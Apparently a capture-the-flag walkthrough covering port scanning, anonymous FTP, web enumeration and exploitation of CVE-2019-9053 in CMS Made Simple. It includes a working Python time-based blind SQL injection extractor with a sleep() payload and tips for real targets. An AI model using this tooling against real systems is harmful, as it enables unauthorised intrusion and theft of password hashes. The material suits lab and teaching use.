Scan the default top 1,000 TCP ports with version detection and default scripts: nmap -T4 -A <ip>
The open services are ftp, http, and ssh.
The ftp server allows anonymous login, so connect with ftp <ip>
and enter anonymous at the username prompt (the password can be left empty).
Once inside, type passive
to toggle passive mode off; without that, directory listings and transfers can hang. We can then navigate through the files on the ftp server and fetch them with get.
Reading the downloaded file on the local machine (cat), we learn that the system password is very weak, so brute forcing it is an option, and that there is likely a user on the system called mitch.
We also learn that he reused the same password on some application on the system.
Looking at the http server, the robots.txt file gives us some information:
mike
might be another user on the system, /openemr
might be useful, and there is a reference to a CUPS
server (Common UNIX Printing System). CUPS normally listens on TCP 631, which was not among the open ports, so we can discount it.
Checking that directory for anything useful, there is really nothing there for us.
Using dirbuster
we find a directory called simple. Navigating to it, we find the CMS Made Simple name and version
at the bottom of the page. Searching for an exploit for that version of CMS Made Simple leads to CVE-2019-9053,
an SQL injection we can use.
We can use searchsploit to find the exploit matching that version:
searchsploit "CMS Made Simple"
Copy the matching entry into the working directory with searchsploit -m <path shown in the results> and run the corresponding Python file against the target. Check its shebang and imports first: public copies of this exploit are often written for Python 2 and import third-party modules such as requests and termcolor, so install those (or run it under the right interpreter) before assuming the target is not vulnerable.
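CVE-2019-9053 is a blind, time-based SQL injection: the application never echoes query results, so the exploit extracts data one character at a time by asking the database yes/no questions and measuring whether the response was delayed by sleep(). The following is an added example (not code from the page or from the public exploit) that implements that extraction loop. The table and column names in blind_payload and the http_oracle wrapper are hypothetical placeholders for the real injection point, which should be taken from the searchsploit copy; the demo runs offline against a simulated oracle with a constructed secret (the MD5 of "password").

```python
"""Time-based blind SQL injection extractor (added example, offline demo)."""
import string
import time
from typing import Callable

# Candidate characters per position. Lowercase hex plus '$', '.', '/' covers
# MD5 hex digests and crypt-style hashes; widen it for arbitrary strings.
CHARSET = string.hexdigits.lower() + "$./"

# An oracle answers one question: "does the secret start with this prefix?"
# Against a live target each call is one HTTP request plus a timing check.
Oracle = Callable[[str], bool]


def blind_payload(prefix: str, sleep_seconds: int = 2) -> str:
    """Build a MySQL conditional-sleep payload for the given prefix.

    secret_table / secret_column are hypothetical names; substitute the real
    injection point. The prefix is hex-encoded so the payload needs no quotes:
    LIKE 0x<hex>25 is LIKE 'prefix%' (0x25 is '%').
    """
    hexed = prefix.encode().hex()
    return (
        f"1)) and (select sleep({sleep_seconds}) from secret_table "
        f"where secret_column like 0x{hexed}25) -- -"
    )


def http_oracle(get, url: str, param: str, sleep_seconds: int = 2) -> Oracle:
    """Turn a GET function (e.g. requests.get) into a timing oracle.

    A response that took at least sleep_seconds means the LIKE matched.
    Not exercised offline; shown for how the pieces fit together.
    """
    def ask(prefix: str) -> bool:
        start = time.monotonic()
        get(url, params={param: blind_payload(prefix, sleep_seconds)})
        return time.monotonic() - start >= sleep_seconds
    return ask


def extract(oracle: Oracle, charset: str = CHARSET, max_len: int = 64) -> str:
    """Recover the secret one character at a time.

    Stops when no candidate extends the current prefix, i.e. at the end of
    the string or at a character outside charset (a sign to widen charset).
    """
    found = ""
    for _ in range(max_len):
        for ch in charset:
            if oracle(found + ch):
                found += ch
                break
        else:
            break
    return found


def simulated_oracle(secret: str, delay: float = 0.0) -> Oracle:
    """Constructed stand-in for the database for offline testing.

    Answers the LIKE 'prefix%' question directly, optionally sleeping the
    way a real server running sleep() would.
    """
    def ask(prefix: str) -> bool:
        if secret.startswith(prefix):
            time.sleep(delay)
            return True
        return False
    return ask


if __name__ == "__main__":
    # Constructed secret: md5("password"), a plausible weak-password hash.
    demo = simulated_oracle("5f4dcc3b5aa765d61d8327deb882cf99")
    print(extract(demo))
```

Two practical caveats when pointing http_oracle at a real target: network jitter can make a non-matching request look slow, so use a sleep of several seconds and a threshold with some margin (or repeat a positive answer once to confirm), and a linear scan over the charset costs up to len(charset) requests per character, so for long strings a binary search on the character's byte value (ASCII() comparisons instead of LIKE) cuts the request count substantially.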